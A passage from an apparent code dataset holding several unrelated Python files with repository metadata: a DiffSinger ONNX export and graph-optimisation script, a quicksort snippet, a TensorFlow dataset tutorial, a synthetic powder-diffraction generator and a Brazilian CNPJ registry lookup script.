del self.sqrt_recipm1_alphas_cumprod\n del self.posterior_log_variance_clipped\n del self.posterior_mean_coef1\n del self.posterior_mean_coef2\n del self.alphas_cumprod\n del self.spec_min\n del self.spec_max\n\n def forward(self, condition, speedup):\n device = condition.device\n condition = condition.transpose(1, 2) # (1, n_frames, 256) => (1, 256, n_frames)\n\n n_frames = condition.shape[2]\n step_range = torch.arange(0, self.K_step, speedup, dtype=torch.long, device=device).flip(0)\n x = torch.randn((1, 1, self.mel_bins, n_frames), device=device)\n\n if speedup > 1:\n plms_noise_stage = torch.tensor(0, dtype=torch.long, device=device)\n noise_list = torch.zeros((0, 1, 1, self.mel_bins, n_frames), device=device)\n for t in step_range:\n noise_pred = self.denoise_fn(x, t, condition)\n t_prev = t - speedup\n t_prev = t_prev * (t_prev > 0)\n\n if plms_noise_stage == 0:\n x_pred = self.plms_noise_predictor(x, noise_pred, t, t_prev)\n noise_pred_prev = self.denoise_fn(x_pred, t_prev, condition)\n noise_pred_prime = self.plms_noise_predictor.predict_stage0(noise_pred, noise_pred_prev)\n elif plms_noise_stage == 1:\n noise_pred_prime = self.plms_noise_predictor.predict_stage1(noise_pred, noise_list)\n elif plms_noise_stage == 2:\n noise_pred_prime = self.plms_noise_predictor.predict_stage2(noise_pred, noise_list)\n else:\n noise_pred_prime = self.plms_noise_predictor.predict_stage3(noise_pred, noise_list)\n\n noise_pred = noise_pred.unsqueeze(0)\n if plms_noise_stage < 3:\n noise_list = torch.cat((noise_list, noise_pred), dim=0)\n plms_noise_stage = plms_noise_stage + 1\n else:\n noise_list = torch.cat((noise_list[-2:], noise_pred), dim=0)\n\n x = self.plms_noise_predictor(x, noise_pred_prime, t, t_prev)\n\n # from dpm_solver import NoiseScheduleVP, model_wrapper, DpmSolver\n # ## 1. Define the noise schedule.\n # noise_schedule = NoiseScheduleVP(betas=self.betas)\n #\n # ## 2. Convert your discrete-time `model` to the continuous-time\n # # noise prediction model. Here is an example for a diffusion model\n # ## `model` with the noise prediction type (\"noise\") .\n #\n # model_fn = model_wrapper(\n # self.denoise_fn,\n # noise_schedule,\n # model_kwargs={\"cond\": condition}\n # )\n #\n # ## 3. 
Define dpm-solver and sample by singlestep DPM-Solver.\n # ## (We recommend singlestep DPM-Solver for unconditional sampling)\n # ## You can adjust the `steps` to balance the computation\n # ## costs and the sample quality.\n # dpm_solver = DpmSolver(model_fn, noise_schedule)\n #\n # steps = t // hparams[\"pndm_speedup\"]\n # x = dpm_solver.sample(x, steps=steps)\n else:\n for t in step_range:\n pred = self.denoise_fn(x, t, condition)\n x = self.naive_noise_predictor(x, pred, t)\n\n mel = self.mel_extractor(x)\n return mel\n\n\nclass DiffDecoder(nn.Module):\n def __init__(self, device):\n super().__init__()\n self.model = build_model()\n self.model.eval()\n self.model.to(device)\n\n def forward(self, condition, speedup):\n mel = self.model.forward(condition, speedup) # (1, n_frames, mel_bins)\n return mel\n\n\ndef build_model():\n model = GaussianDiffusion(\n out_dims=hparams['audio_num_mel_bins'],\n timesteps=hparams['timesteps'],\n k_step=hparams['K_step'],\n spec_min=hparams['spec_min'],\n spec_max=hparams['spec_max'],\n )\n model.eval()\n load_ckpt(model, hparams['work_dir'], 'model', strict=False)\n model.build_submodules()\n return model\n\n\ndef _fix_cast_nodes(graph, logs=None):\n if logs is None:\n logs = []\n for sub_node in graph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(branch, logs)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fix_cast_nodes(body, logs)\n elif sub_node.op_type == 'Cast':\n for i, sub_attr in enumerate(sub_node.attribute):\n if sub_attr.name == 'to':\n to = onnx.helper.get_attribute_value(sub_attr)\n if to == onnx.TensorProto.DOUBLE:\n float32 = onnx.helper.make_attribute('to', onnx.TensorProto.FLOAT)\n sub_node.attribute.remove(sub_attr)\n sub_node.attribute.insert(i, float32)\n logs.append(sub_node.name)\n break\n return logs\n\n\ndef _fold_shape_gather_equal_if_to_squeeze(graph, subgraph, logs=None):\n if logs is None:\n logs = []\n\n # Do folding in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, branch, logs)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _fold_shape_gather_equal_if_to_squeeze(graph, body, logs)\n\n # Do folding in current graph.\n i_shape = 0\n while i_shape < len(subgraph.node):\n if subgraph.node[i_shape].op_type == 'Shape':\n shape_node = subgraph.node[i_shape]\n shape_out = shape_node.output[0]\n i_gather = i_shape + 1\n while i_gather < len(subgraph.node):\n if subgraph.node[i_gather].op_type == 'Gather' and subgraph.node[i_gather].input[0] == shape_out:\n gather_node = subgraph.node[i_gather]\n gather_out = gather_node.output[0]\n i_equal = i_gather + 1\n while i_equal < len(subgraph.node):\n if subgraph.node[i_equal].op_type == 'Equal' and (\n subgraph.node[i_equal].input[0] == gather_out\n or subgraph.node[i_equal].input[1] == gather_out):\n equal_node = subgraph.node[i_equal]\n equal_out = equal_node.output[0]\n i_if = i_equal + 1\n while i_if < len(subgraph.node):\n if subgraph.node[i_if].op_type == 'If' and subgraph.node[i_if].input[0] == equal_out:\n # Found the substructure to be folded.\n if_node = subgraph.node[i_if]\n # Search and clean initializer values.\n squeeze_axes_tensor = None\n 
for tensor in subgraph.initializer:\n if tensor.name == gather_node.input[1]:\n squeeze_axes_tensor = tensor\n subgraph.initializer.remove(tensor)\n elif tensor.name == equal_node.input[1]:\n subgraph.initializer.remove(tensor)\n # Create 'Squeeze' node.\n squeeze_node = onnx.helper.make_node(\n op_type='Squeeze',\n inputs=shape_node.input,\n outputs=if_node.output\n )\n squeeze_axes = onnx.helper.make_attribute(\n key='axes',\n value=[struct.unpack('q', squeeze_axes_tensor.raw_data)[0]] # unpack int64\n )\n squeeze_node.attribute.extend([squeeze_axes])\n # Replace 'Shape', 'Gather', 'Equal', 'If' with 'Squeeze'.\n subgraph.node.insert(i_shape, squeeze_node)\n subgraph.node.remove(shape_node)\n subgraph.node.remove(gather_node)\n subgraph.node.remove(equal_node)\n subgraph.node.remove(if_node)\n logs.append((shape_node.name, gather_node.name, equal_node.name, if_node.name))\n break\n i_if += 1\n else:\n break\n i_equal += 1\n else:\n break\n i_gather += 1\n else:\n break\n i_shape += 1\n return logs\n\n\ndef _extract_conv_nodes(graph, weight_pattern, alias_prefix):\n node_dict = {} # key: pattern match, value: (alias, node)\n logs = []\n\n def _extract_conv_nodes_recursive(subgraph):\n to_be_removed = []\n for sub_node in subgraph.node:\n if sub_node.op_type == 'If':\n for attr in sub_node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(branch)\n elif sub_node.op_type == 'Loop':\n for attr in sub_node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _extract_conv_nodes_recursive(body)\n elif sub_node.op_type == 'Conv' and re.match(weight_pattern, sub_node.input[1]):\n # Found node to extract\n cached = node_dict.get(sub_node.input[1])\n if cached is None:\n out_alias = f'{alias_prefix}.{len(node_dict)}'\n node_dict[sub_node.input[1]] = (out_alias, sub_node)\n else:\n out_alias = cached[0]\n out = sub_node.output[0]\n # Search for nodes downstream the extracted node and match them to the renamed output\n for dep_node in subgraph.node:\n for dep_idx, dep_input in enumerate(dep_node.input):\n if dep_input == out:\n dep_node.input.remove(out)\n dep_node.input.insert(dep_idx, out_alias)\n # Add the node to the remove list\n to_be_removed.append(sub_node)\n logs.append(sub_node.name)\n [subgraph.node.remove(_n) for _n in to_be_removed]\n\n for i, n in enumerate(graph.node):\n if n.op_type == 'If':\n for a in n.attribute:\n b = onnx.helper.get_attribute_value(a)\n _extract_conv_nodes_recursive(b)\n for key in reversed(node_dict):\n alias, node = node_dict[key]\n # Rename output of the node\n out_name = node.output[0]\n node.output.remove(node.output[0])\n node.output.insert(0, alias)\n # Insert node into the main graph\n graph.node.insert(i, node)\n # Rename value info of the output\n for v in graph.value_info:\n if v.name == out_name:\n v.name = alias\n break\n break\n return logs\n\n\ndef _remove_unused_values(graph):\n used_values = set()\n cleaned_values = []\n\n def _record_usage_recursive(subgraph):\n for node in subgraph.node:\n # For 'If' and 'Loop' nodes, do recording recursively\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _record_usage_recursive(body)\n # For each node, record its inputs and outputs\n for input_value in node.input:\n used_values.add(input_value)\n for 
output_value in node.output:\n used_values.add(output_value)\n\n def _clean_unused_recursively(subgraph):\n # Do cleaning in sub-graphs recursively.\n for node in subgraph.node:\n if node.op_type == 'If':\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(branch)\n elif node.op_type == 'Loop':\n for attr in node.attribute:\n if attr.name == 'body':\n body = onnx.helper.get_attribute_value(attr)\n _clean_unused_recursively(body)\n\n # Do cleaning in current graph.\n i = 0\n while i < len(subgraph.initializer):\n if subgraph.initializer[i].name not in used_values:\n cleaned_values.append(subgraph.initializer[i].name)\n subgraph.initializer.remove(subgraph.initializer[i])\n else:\n i += 1\n i = 0\n while i < len(subgraph.value_info):\n if subgraph.value_info[i].name not in used_values:\n cleaned_values.append(subgraph.value_info[i].name)\n subgraph.value_info.remove(subgraph.value_info[i])\n else:\n i += 1\n\n _record_usage_recursive(graph)\n _clean_unused_recursively(graph)\n return cleaned_values\n\n\ndef fix(src, target):\n model = onnx.load(src)\n\n # The output dimension are wrongly hinted by TorchScript\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n out_dims.remove(out_dims[1])\n out_dims.insert(1, in_dims[1])\n print(f'| annotate output: \\'{model.graph.output[0].name}\\'')\n\n # Fix 'Cast' nodes in sub-graphs that wrongly cast tensors to float64\n fixed_casts = _fix_cast_nodes(model.graph)\n print('| fix node(s): ')\n for i, log in enumerate(fixed_casts):\n if i == len(fixed_casts) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #1 of the simplifier to fix missing value info and type hints and remove unnecessary 'Cast'.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n in_dims = model.graph.input[0].type.tensor_type.shape.dim\n out_dims = model.graph.output[0].type.tensor_type.shape.dim\n\n then_branch = None\n for node in model.graph.node:\n if node.op_type == 'If':\n # Add type hint to let the simplifier fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze'\n if_out = node.output[0]\n for info in model.graph.value_info:\n if info.name == if_out:\n if_out_dim = info.type.tensor_type.shape.dim\n while len(if_out_dim) > 0:\n if_out_dim.remove(if_out_dim[0])\n if_out_dim.insert(0, in_dims[0]) # batch_size\n if_out_dim.insert(1, in_dims[0]) # 1\n if_out_dim.insert(2, out_dims[2]) # mel_bins\n if_out_dim.insert(3, in_dims[1]) # n_frames\n print(f'| annotate node: \\'{node.name}\\'')\n\n # Manually fold 'Shape', 'Gather', 'Equal', 'If' to 'Squeeze' in sub-graphs\n folded_groups = []\n for attr in node.attribute:\n branch = onnx.helper.get_attribute_value(attr)\n folded_groups += _fold_shape_gather_equal_if_to_squeeze(model.graph, branch)\n if attr.name == 'then_branch':\n # Save branch for future use\n then_branch = branch\n print('| fold node group(s): ')\n print(', '.join(['[' + ', '.join([f'\\'{n}\\'' for n in log]) + ']' for log in folded_groups]))\n break\n\n # Optimize 'Concat' nodes for shapes\n concat_node = None\n shape_prefix_name = 'noise.shape.prefix'\n list_length_name = 'list.length'\n for node in model.graph.node:\n if node.op_type == 'Concat':\n concat_node = node\n for i, ini in enumerate(model.graph.initializer):\n if ini.name == node.input[0]:\n shape_prefix 
= onnx.helper.make_tensor(\n name=shape_prefix_name,\n data_type=onnx.TensorProto.INT64,\n dims=(3,),\n vals=[out_dims[0].dim_value, 1, out_dims[2].dim_value]\n )\n list_length = onnx.helper.make_tensor(\n name=list_length_name,\n data_type=onnx.TensorProto.INT64,\n dims=(1,),\n vals=[0]\n )\n model.graph.initializer.extend([shape_prefix, list_length])\n break\n for i in range(3):\n node.input.remove(node.input[0])\n node.input.insert(0, shape_prefix_name)\n print(f'| optimize node: \\'{node.name}\\'')\n break\n for node in then_branch.node:\n if node.op_type == 'Concat':\n concat_inputs = list(node.input)\n dep_nodes = []\n for dep_node in then_branch.node:\n if dep_node.op_type == 'Unsqueeze' and dep_node.output[0] in concat_inputs:\n dep_nodes.append(dep_node)\n [then_branch.node.remove(d_n) for d_n in dep_nodes]\n while len(node.input) > 0:\n node.input.remove(node.input[0])\n node.input.extend([list_length_name, concat_node.output[0]])\n print(f'| optimize node: \\'{node.name}\\'')\n break\n\n # Extract 'Conv' nodes and cache results of conditioner projection\n # of each residual layer from loop bodies to improve performance.\n extracted_convs = _extract_conv_nodes(\n model.graph,\n r'model\\.denoise_fn\\.residual_layers\\.\\d+\\.conditioner_projection\\.weight',\n 'cache'\n )\n\n print(f'| extract node(s):')\n for i, log in enumerate(extracted_convs):\n if i == len(extracted_convs) - 1:\n end = '\\n'\n elif i % 10 == 9:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Remove unused initializers and value infos\n cleaned_values = _remove_unused_values(model.graph)\n print(f'| clean value(s):')\n for i, log in enumerate(cleaned_values):\n if i == len(cleaned_values) - 1:\n end = '\\n'\n elif i % 15 == 14:\n end = ',\\n'\n else:\n end = ', '\n print(f'\\'{log}\\'', end=end)\n\n # Run #2 of the simplifier to further optimize the graph and reduce dangling sub-graphs.\n print('Running ONNX simplifier...')\n model, check = onnxsim.simplify(model, include_subgraph=True)\n assert check, 'Simplified ONNX model could not be validated'\n\n onnx.save(model, target)\n print('Graph fixed and optimized.')\n\n\ndef export(model_path):\n set_hparams(print_hparams=False)\n device = 'cuda' if torch.cuda.is_available() else 'cpu'\n decoder = DiffDecoder(device)\n n_frames = 10\n\n with torch.no_grad():\n shape = (1, 1, hparams['audio_num_mel_bins'], n_frames)\n noise_t = torch.randn(shape, device=device)\n noise_list = torch.randn((3, *shape), device=device)\n condition = torch.rand((1, hparams['hidden_size'], n_frames), device=device)\n step = (torch.rand((), device=device) * hparams['K_step']).long()\n speedup = (torch.rand((), device=device) * step / 10.).long()\n step_prev = torch.maximum(step - speedup, torch.tensor(0, dtype=torch.long, device=device))\n\n print('Tracing modules...')\n decoder.model.denoise_fn = torch.jit.trace(\n decoder.model.denoise_fn,\n (\n noise_t,\n step,\n condition\n )\n )\n decoder.model.naive_noise_predictor = torch.jit.trace(\n decoder.model.naive_noise_predictor,\n (\n noise_t,\n noise_t,\n step\n ),\n check_trace=False\n )\n decoder.model.plms_noise_predictor = torch.jit.trace_module(\n decoder.model.plms_noise_predictor,\n {\n 'forward': (\n noise_t,\n noise_t,\n step,\n step_prev\n ),\n 'predict_stage0': (\n noise_t,\n noise_t\n ),\n 'predict_stage1': (\n noise_t,\n noise_list\n ),\n 'predict_stage2': (\n noise_t,\n noise_list\n ),\n 'predict_stage3': (\n noise_t,\n noise_list\n ),\n }\n )\n decoder.model.mel_extractor = torch.jit.trace(\n 
decoder.model.mel_extractor,\n (\n noise_t\n )\n )\n\n decoder = torch.jit.script(decoder)\n condition = torch.rand((1, n_frames, hparams['hidden_size']), device=device)\n speedup = torch.tensor(10, dtype=torch.long, device=device)\n dummy = decoder.forward(condition, speedup)\n\n torch.onnx.export(\n decoder,\n (\n condition,\n speedup\n ),\n model_path,\n input_names=[\n 'condition',\n 'speedup'\n ],\n output_names=[\n 'mel'\n ],\n dynamic_axes={\n 'condition': {\n 1: 'n_frames'\n }\n },\n opset_version=11,\n example_outputs=(\n dummy\n )\n )\n print('PyTorch ONNX export finished.')\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Export diffusion decoder to ONNX')\n parser.add_argument('--exp', type=str, required=True, help='Experiment to export')\n parser.add_argument('--target', required=False, type=str, help='Path of the target ONNX model')\n args = parser.parse_args()\n\n cwd = os.getcwd()\n if args.target:\n target = os.path.join(cwd, args.target)\n else:\n target = None\n os.chdir(root_dir)\n exp = args.exp\n sys.argv = [\n 'inference/ds_cascade.py',\n '--config',\n f'checkpoints/{exp}/config.yaml',\n '--exp_name',\n exp\n ]\n\n path = f'onnx/assets/{exp}.onnx' if not target else target\n export(path)\n fix(path, path)\n\n os.chdir(cwd)\n if args.target:\n log_path = os.path.abspath(args.target)\n else:\n log_path = path\n print(f'| export \\'model\\' to \\'{log_path}\\'.')\n","repo_name":"kongjian123/DiffSinger","sub_path":"onnx/export/export_diff_decoder.py","file_name":"export_diff_decoder.py","file_ext":"py","file_size_in_byte":36468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"16"}
+{"seq_id":"40662857949","text":"def qsort(a, start, end):\n \"\"\" quicksort in O(nlogn), no extra memory, in-place\"\"\"\n if start < end:\n p = choosepivot(start, end)\n if p != start:\n a[p], a[start] = a[start], a[p]\n equal = partition(a, start, end)\n qsort(a, start, equal-1)\n qsort(a, equal+1, end)\ndef partition(a, l, r):\n pivot, i = a[l], l+1\n for j in range(l+1, r+1):\n if a[j] <= pivot:\n a[i],a[j] = a[j],a[i]\n i += 1\n # swap pivot to its correct place\n a[l], a[i-1] = a[i-1], a[l]\n return i-1\ndef choosepivot(s, e):\n return randint(s,e)","repo_name":"bdlm-dev/Competitive-Programming-Codebook","sub_path":"content/flow/quicksort.py","file_name":"quicksort.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"71570507848","text":"import numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nX = tf.constant([2013, 2014, 2015, 2016, 2017])\nY = tf.constant([12000, 14000, 15000, 16500, 17500])\n\ndataset = tf.data.Dataset.from_tensor_slices((X, Y))\n\nfor x, y in dataset:\n print(x.numpy(), y.numpy())\n\n(trainData, trainLabel), (_, _) = tf.keras.datasets.mnist.load_data()\n\ntrainData = np.expand_dims(trainData.astype(np.float32) / 255.0, axis=-1)\nmnist_dataset = tf.data.Dataset.from_tensor_slices((trainData, trainLabel))\n\nfor image, label in mnist_dataset:\n plt.title(label.numpy())\n plt.imshow(image.numpy()[:, :, 0])\n plt.show()\n break\n\n\n# Map\ndef rot90(ima, lab):\n ima = tf.image.rot90(ima)\n return ima, lab\n\n\nmnist_dataset = mnist_dataset.map(rot90)\n\n# Shuffle\n\n# Batch\nmnist_dataset = mnist_dataset.batch(4)\nfor images, labels in mnist_dataset:\n fig, axs = plt.subplots(1, 4)\n for i in range(4):\n axs[i].set_title(labels.numpy()[i])\n axs[i].imshow(images.numpy()[i, :, :, 0])\n plt.show()\n break;\n\n# Repeat\n\n# Reduce\n\n# Take\n","repo_name":"xin-pu/TFLearning","sub_path":"BasciTF/Data/DataSet.py","file_name":"DataSet.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"}
+{"seq_id":"2887688104","text":"#!/usr/bin/env python3\nfrom __future__ import absolute_import, division, print_function\nimport iotbx.pdb\nimport iotbx.mrcfile\nfrom scitbx.array_family import flex\nfrom cctbx.development import random_structure\nfrom cctbx import sgtbx\nfrom cctbx import maptbx\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom random import randrange\nfrom multiprocessing import Pool\nimport time\nfrom scipy.stats import truncnorm\n\nimport matplotlib.pyplot as plt\n\nnp.random.seed(5)\n\nlambd = 1.540596\n\ndef fwhm(peak, lh = 10*0.437, Lam = 1.540596):\n Rad2 = 360 / np.pi\n return lh / 10**3 / Lam * np.tan(peak / Rad2) * Rad2\n\ndef LP_Factor(Th2, CeV = 0):\n Deg = np.pi / 180\n A = np.cos(CeV*Deg)**2\n return (1 + A * np.cos(Th2*Deg) ** 2) / (1 + A) / np.sin(Th2*Deg)\n\ndef lorenz(Th2, peak, peak_i):\n return (2 / np.pi / fwhm(peak_i)) / (1 + 4 * (Th2 - peak)**2 / fwhm(peak_i)**2)\n\ndef h(phi, peak):\n return L*np.sqrt(np.cos(phi*np.pi/180)**2/np.cos(peak*np.pi/180)**2 - 1)\ndef phi_min(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H+S)/L)**2 + 1 ))\ndef phi_infl(peak):\n return 180/np.pi*np.arccos(np.cos(peak*np.pi/180)*np.sqrt( ((H-S)/L)**2 + 1 ))\ndef W(phi, peak):\n if phi < phi_min(peak):\n return 0\n if phi_min(peak) <= phi <= phi_infl(peak):\n return H + S - h(phi, peak)\n if phi_infl(peak) <= phi <= peak:\n return 2*min(H, S)\n if phi > peak:\n return 0\n\ndef W2(phis, peak):\n result = np.zeros(len(phis))\n cond1 = (phi_min(peak) <= phis) & (phis <= phi_infl(peak))\n result[cond1] = H + S - h(phis[cond1], peak)\n cond2 = (phis > phi_infl(peak)) & (phis <= peak)\n result[cond2] = 2 * min(H, S)\n return result\n\ndef pool_peaks(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 20\n elif peak < 30:\n N_gauss = 14\n elif peak < 70:\n N_gauss = 7\n else:\n N_gauss = 4\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n for phi in theta2[a:b]:\n # print(deltan)\n if phi == theta2[peak_index]:\n xn, wn = np.polynomial.legendre.leggauss(20)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n sum1 = np.sum(wn*W2(deltan, peak)*lorenz(phi, deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n\ndef pool_peaks2(peak_i):\n peak = theta_peaks[peak_i]\n a, b = np.where(peak - 3 <= theta2)[0][0], np.where(theta2 <= peak + 3)[0][-1]\n peak_index = np.where(theta2 <= peak)[0][-1]\n #tmp = tmp / np.sum(tmp) / step * factors[peak_i]\n if peak < 10:\n N_gauss = 30\n elif peak < 30:\n N_gauss = 20\n elif peak < 70:\n N_gauss = 20\n else:\n N_gauss = 20\n xn, wn = np.polynomial.legendre.leggauss(N_gauss)\n deltan = (peak+phi_min(peak))/2 + (peak-phi_min(peak))*xn/2\n tmp_assy = np.zeros(len(theta2[a:b]))\n i = 0\n sum2 = np.sum(wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180))\n arr1 = wn*W2(deltan, peak)/h(deltan, peak)/np.cos(deltan*np.pi/180)\n for phi in theta2[a:b]:\n # print(deltan)\n sum1 = np.sum(arr1 * lorenz(phi, deltan, peak))\n tmp_assy[i] = sum1/sum2\n i = i+1\n tmp_assy = 
tmp_assy / np.sum(tmp_assy) / step * factors[peak_i]\n #y += y_tmp\n #print(y)\n return (a, b, tmp_assy)\n #y_none[a:b] += tmp\n\n\ndef truncated_normal(mean, stddev, minval, maxval, n):\n a, b = (minval - mean) / stddev, (maxval - mean) / stddev\n r = truncnorm(a,b, loc = mean, scale = stddev)\n return(r.rvs(n))\n\n\ndef dmin (angle = 90):\n return lambd / np.sin(angle/180*np.pi) / 2\n\ndef XRS(groups, cell, elemental):\n xrs = random_structure.xray_structure(\n space_group_info = sgtbx.space_group_info(groups),\n elements = elemental,\n unit_cell = cell)\n a = xrs.structure_factors(d_min= dmin()).f_calc().sort()\n I = a.as_intensity_array().data().as_numpy_array()\n m = a.multiplicities().data().as_numpy_array()\n for i in range(len(m)):\n I[i] *= m[i]\n Ind = list(a.indices())\n D = a.d_spacings().data().as_numpy_array()\n T2 = a.two_theta(lambd, deg = True).data().as_numpy_array()\n return I, Ind, D, T2\n\n\nif __name__ == '__main__':\n N = 3 #number of pictures\n\n cell_a = truncated_normal(10.05493, 2.792331, 2, 10000, N)\n cell_b = truncated_normal(12.18931, 3.201324, 2, 10000, N)\n cell_c = truncated_normal(15.10612, 4.623489, 2, 10000, N)\n angle_a = truncated_normal(90, 13.83713, 40, 140, N)\n angle_b = truncated_normal(90, 11.86436, 40, 140, N)\n angle_c = truncated_normal(90, 14.70701, 40, 140, N)\n\n\n\n #setting parameters for assymetry\n L, H, S = 720, 7.5, 10.7\n cells = list(zip(cell_a, cell_b, cell_c, angle_a, angle_b, angle_c))\n groups = \"P-1\" #setting for groups\n elemental = [[\"C\"]*randrange(6, 15) for i in range(N)] #setting for elemets\n for i in range(N):\n factors, index, d_s, theta_peaks = XRS(groups, cells[i], elemental[i])\n theta2 = np.arange(1, 90, 0.005)\n theta_peaks = theta_peaks[theta_peaks < 89] # берем только нужные пики\n #print(range(len(theta_peaks)))\n step = theta2[1] - theta2[0]\n y = np.zeros(len(theta2))\n #y_none = np.zeros(len(theta2))\n\n with Pool(processes = 8) as p:\n z = p.map(pool_peaks2, range(len(theta_peaks))) #ассиметрия пиков\n #print(z)\n for j in z:\n y[j[0]:j[1]] += j[2]\n #print(y_end)\n #y.wait()\n y = np.multiply(y, LP_Factor(theta2))\n #print(y_end)\n #y_none = np.multiply(y_none, LP_Factor(theta2))\n coeffs = np.random.normal(loc = 0, scale = 1, size = 14)\n xx = np.linspace(-1, 1, len(theta2))\n yy = np.polynomial.chebyshev.chebval(xx, coeffs)\n a, b = 0.2, 90\n x1, x2 = -1, 1 #background\n xx = (a - b)/(x1 - x2)*xx + (b*x1-a*x2)/(x1-x2)\n a, b = 0, 25000\n y1, y2 = np.min(yy), np.max(yy)\n yy = (a - b)/(y1 - y2)*yy + (b*y1-a*y2)/(y1-y2)\n y += yy\n #y_none += yy\n file = open('./cryst_edit'+str(i)+'.txt', 'w')\n for j in range(0, len(theta2), 1):\n file.write(str(theta2[j])+ ' ' + str(y[j]))\n file.write('\\n')\n file.close()\n","repo_name":"blackwood168/random_diffraction","sub_path":"random_proga_pool_edit.py","file_name":"random_proga_pool_edit.py","file_ext":"py","file_size_in_byte":6851,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"}
+{"seq_id":"19910228869","text":"import requests\nimport json\nimport time\nimport pandas\n\ndef importar_csv(endereco):\n tabela = pandas.read_excel(endereco)\n total_cnpj = []\n for linha in tabela['cnpj']:\n total_cnpj.append(str(linha).rjust(14, '0'))\n return total_cnpj\n\ndef cria_arquivo(endereco):\n # Criar um arquivo\n arquivo = open(endereco, 'w')\n #arquivo.write(texto)\n arquivo.close()\n\ndef atualizar_arquivo(endereco, lista):\n arquivo = open(endereco, 'a')\n for i in range(len(lista)):\n valor = lista[i]\n arquivo.write(valor + ',')\n arquivo.write('\\n')\n #print(lista)\n arquivo.close()\n\ndef ler_arquivo(endereco):\n arquivo = open(endereco, 'r')\n texto = arquivo.read()\n print(texto)\n\n#Consulta limitada a 3 CNPJs por minuto\n#https://www.sintegraws.com.br/api/documentacao-api-receita-federal.php\ndef api_cnpj(lista_cnpj, loop):\n lista_dados = []\n for cnpj in lista_cnpj:\n url = f\"https://receitaws.com.br/v1/cnpj/{cnpj}\"\n querystring = {\"token\":\"XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXXXX\",\"cnpj\":\"06990590000123\",\"plugin\":\"RF\"}\n try:\n consulta = requests.request(\"GET\", url, params=querystring)\n dado = json.loads(consulta.text)\n # API acessada com sucesso.\n ativ1 = dado['atividade_principal']\n cnae_cod1 = ativ1[0]['code'].replace(\",\",\";\")\n cnae_text1 = ativ1[0]['text'].replace(\",\",\";\")\n cont = 0\n ativ2 = dado['atividades_secundarias']\n while cont < len(ativ2):\n if cont == 0:\n cnae_cod2 = ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = ativ2[cont]['text'].replace(\",\",\";\")\n else:\n cnae_cod2 = cnae_cod2 + ',' + ativ2[cont]['code'].replace(\",\",\";\")\n cnae_text2 = cnae_text2 + ',' + ativ2[cont]['text'].replace(\",\",\";\")\n cont = cont + 1\n\n lista_dados.append(\n [\n dado['cnpj'],\n dado['nome'],\n # dado['numero'],\n # dado['complemento'],\n dado['cep'],\n # dado['bairro'],\n dado['municipio'],\n dado['uf'],\n # dado['email'],\n # dado['telefone']\n #cnae_cod1,\n #cnae_text1,\n #cnae_cod2,\n #cnae_text2\n ]\n )\n except Exception as erro:\n lista_dados.append(\n [\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro',\n 'erro'\n ]\n )\n #Pausa no cod devido limite de consulta de 3 CNPJs por min\n if loop >3:\n time.sleep(70)\n\n return lista_dados\n\ndiretorio = 'C:/Users/andremt/OneDrive - Votorantim/Documentos/Python/'\n\n#Buscar xlsx com os CNPJs\nnome_arquivo = 'Lista_CNPJ.xlsx'\nendereco = diretorio + nome_arquivo\ntotal_cnpj = importar_csv(endereco)\n\n#Arquivo que retornará valores da 